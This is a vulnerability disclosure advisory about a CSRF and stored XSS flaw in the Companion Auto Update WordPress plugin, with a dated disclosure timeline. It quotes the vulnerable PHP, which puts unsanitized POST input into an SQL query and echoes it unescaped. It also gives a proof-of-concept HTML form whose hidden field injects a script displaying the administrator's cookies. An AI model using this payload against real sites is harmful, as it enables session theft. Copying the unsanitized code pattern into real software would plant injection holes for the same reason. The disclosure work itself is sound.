01 Jun

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Companion Auto Update

We recently found that the plugin Companion Auto Update contained a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability with the plugin’s settings.

The CSRF portion is caused by a lack of a nonce being included with a request to change the plugin’s settings and a lack of check that valid one is included when doing the saving.

For the XSS portion, when the setting were saved the “Email address” input was not sanitized (in the file /companion-auto-update.php):

179
$email 			= $_POST['cau_email'];
187
$wpdb->query( " UPDATE $table_name SET onoroff = '$email' WHERE name = 'email' " );

When it was output on the settings page it wasn’t escaped either:

245
246
if( $cau_configs[4]->onoroff == '' ) $toemail = get_option('admin_email'); 
else $toemail = $cau_configs[4]->onoroff;
<input type="text" name="cau_email" id="cau_email" class="regular-text" placeholder="<?php echo get_option('admin_email'); ?>" value="<?php echo $toemail; ?>" />

After we notified the developer the released version 2.9.4, which fixes the XSS portion by sanitizing the input using sanitize_email():

181
$email          = sanitize_email( $_POST['cau_email'] );

The CSRF portion still exists at this time.

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/tools.php?page=cau-settings, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=cau-settings" method="POST">
<input type="hidden" name="cau_email" value='"</textarea><script>alert(document.cookie);</script>'>
<input type="submit" name="submit" value="Save Changes" />
</form>
</body>
</html>

Timeline

  • May 30, 2017 – Developer notified.
  • May 31, 2017 – Version 2.9.4 released, which fixes CSRF/XSS vulnerability. CSRF portion still exists.